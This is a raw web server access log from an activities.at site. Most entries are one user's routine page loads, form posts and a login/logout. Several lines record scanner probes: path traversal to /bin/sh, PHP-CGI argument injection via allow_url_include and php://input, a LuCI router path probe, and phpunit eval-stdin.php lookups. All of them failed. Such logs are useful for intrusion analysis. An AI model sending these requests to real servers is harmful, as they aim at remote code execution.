77.119.174.15 - - [04/Mar/2025:18:38:12 +0100] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 3028 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:38:13 +0100] "POST /entry.php?id=10716 HTTP/1.1" 200 7772 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:38:13 +0100] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:38:13 +0100] "GET /gui/javascript/form_form.js?1741109893 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:38:13 +0100] "GET /activities/framework/KoolControls/KoolComboBox/koolcombobox.php?32981a13284db7a021131df49e6cd203 HTTP/1.1" 200 4607 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:38:13 +0100] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:38:57 +0100] "GET /entry.php?id=10271&&ser=109877 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=109816" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:38:57 +0100] "GET /gui/javascript/form_form.js?1741109937 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=109877" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
141.255.166.90 - - [04/Mar/2025:18:39:25 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
77.119.174.15 - - [04/Mar/2025:18:39:57 +0100] "GET /entry.php?id=10271&&ser=109937 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=109877" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:39:58 +0100] "GET /gui/javascript/form_form.js?1741109998 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=109937" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:40:58 +0100] "GET /entry.php?id=10271&&ser=109998 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=109937" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:40:58 +0100] "GET /gui/javascript/form_form.js?1741110058 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=109998" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:41:58 +0100] "GET /entry.php?id=10271&&ser=110058 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=109998" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:41:58 +0100] "GET /gui/javascript/form_form.js?1741110118 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110058" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:42:58 +0100] "GET /entry.php?id=10271&&ser=110118 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=110058" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:42:58 +0100] "GET /gui/javascript/form_form.js?1741110178 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110118" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
164.52.24.188 - - [04/Mar/2025:18:43:44 +0100] "\x16\x03\x01\x02" 400 383 "-" "-"
77.119.174.15 - - [04/Mar/2025:18:43:59 +0100] "GET /entry.php?id=10271&&ser=110178 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=110118" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:43:59 +0100] "GET /gui/javascript/form_form.js?1741110239 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110178" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
164.52.24.188 - - [04/Mar/2025:18:44:00 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
77.119.174.15 - - [04/Mar/2025:18:44:59 +0100] "GET /entry.php?id=10271&&ser=110239 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=110178" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:44:59 +0100] "GET /gui/javascript/form_form.js?1741110299 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110239" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:00 +0100] "GET /entry.php?id=10271&&ser=110299 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=110239" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:00 +0100] "GET /gui/javascript/form_form.js?1741110360 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110299" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:50 +0100] "POST /entry.php?id=10715 HTTP/1.1" 200 2611 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:50 +0100] "GET /gui/javascript/form_form.js?1741110410 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:50 +0100] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2312 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:50 +0100] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 3028 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:51 +0100] "POST /entry.php?id=10716 HTTP/1.1" 200 7769 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:51 +0100] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:51 +0100] "GET /gui/javascript/form_form.js?1741110411 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:51 +0100] "GET /activities/framework/KoolControls/KoolComboBox/koolcombobox.php?32981a13284db7a021131df49e6cd203 HTTP/1.1" 200 4607 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:46:51 +0100] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:00 +0100] "GET /entry.php?id=10271&&ser=110360 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=110299" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:00 +0100] "GET /gui/javascript/form_form.js?1741110420 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110360" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:34 +0100] "POST /entry.php?id=10715 HTTP/1.1" 200 2612 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:35 +0100] "GET /gui/javascript/form_form.js?1741110455 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:35 +0100] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2312 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:35 +0100] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 3016 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:36 +0100] "POST /entry.php?id=10716 HTTP/1.1" 200 7762 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:36 +0100] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:36 +0100] "GET /gui/javascript/form_form.js?1741110456 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:36 +0100] "GET /activities/framework/KoolControls/KoolComboBox/koolcombobox.php?32981a13284db7a021131df49e6cd203 HTTP/1.1" 200 4607 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:47:36 +0100] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:01 +0100] "GET /entry.php?id=10271&&ser=110420 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=110360" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:01 +0100] "GET /gui/javascript/form_form.js?1741110481 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110420" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:14 +0100] "POST /entry.php?id=10715 HTTP/1.1" 200 2611 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:14 +0100] "GET /gui/javascript/form_form.js?1741110494 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:14 +0100] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2312 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:14 +0100] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 3017 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:15 +0100] "POST /entry.php?id=10716 HTTP/1.1" 200 7762 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:15 +0100] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:15 +0100] "GET /gui/javascript/form_form.js?1741110495 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:15 +0100] "GET /activities/framework/KoolControls/KoolComboBox/koolcombobox.php?32981a13284db7a021131df49e6cd203 HTTP/1.1" 200 4607 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:48:16 +0100] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:00 +0100] "POST /entry.php?id=10715 HTTP/1.1" 200 2609 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:01 +0100] "GET /gui/javascript/form_form.js?1741110541 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:01 +0100] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2312 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:01 +0100] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 3011 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:01 +0100] "POST /entry.php?id=10716 HTTP/1.1" 200 7756 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:02 +0100] "GET /entry.php?id=10271&&ser=110481 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=110420" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:02 +0100] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:02 +0100] "GET /gui/javascript/form_form.js?1741110542 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:02 +0100] "GET /gui/javascript/form_form.js?1741110542 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110481" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:02 +0100] "GET /activities/framework/KoolControls/KoolComboBox/koolcombobox.php?32981a13284db7a021131df49e6cd203 HTTP/1.1" 200 4607 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:49:02 +0100] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:50:02 +0100] "GET /entry.php?id=10271&&ser=110542 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=110481" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:50:02 +0100] "GET /gui/javascript/form_form.js?1741110602 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110542" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:51:02 +0100] "GET /entry.php?id=10271&&ser=110602 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=110542" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:51:02 +0100] "GET /gui/javascript/form_form.js?1741110662 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:03 +0100] "GET /entry.php?id=10271&&ser=110662 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=110602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:03 +0100] "GET /gui/javascript/form_form.js?1741110723 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=110662" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:42 +0100] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1879 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:42 +0100] "GET /gui/javascript/form_form.js?1741110762 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:43 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 2433 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:43 +0100] "GET /gui/javascript/form_form.js?1741110763 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:43 +0100] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1911 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:43 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:43 +0100] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:43 +0100] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:43 +0100] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
77.119.174.15 - - [04/Mar/2025:18:52:43 +0100] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
109.236.61.115 - - [04/Mar/2025:18:56:16 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.135 - - [04/Mar/2025:19:01:59 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image099.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Mar/2025:19:06:10 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10253059.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [04/Mar/2025:19:09:44 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
93.174.93.12 - - [04/Mar/2025:19:15:55 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8"
195.178.110.54 - - [04/Mar/2025:19:45:42 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [04/Mar/2025:19:47:44 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12466917.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [04/Mar/2025:19:51:42 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10668837.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [04/Mar/2025:19:51:42 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [04/Mar/2025:19:55:42 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11035066.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Mar/2025:19:59:43 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10770060.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [04/Mar/2025:20:18:35 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
46.19.143.58 - - [04/Mar/2025:20:30:53 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
129.159.27.80 - - [04/Mar/2025:20:32:03 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:32:10 +0100] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:32:17 +0100] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 356 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:32:24 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 395 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:32:30 +0100] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 391 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:32:37 +0100] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 387 "-" "Custom-AsyncHttpClient"
129.159.27.80 - - [04/Mar/2025:20:32:45 +0100] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 383 "-" "Custom-AsyncHttpClient"
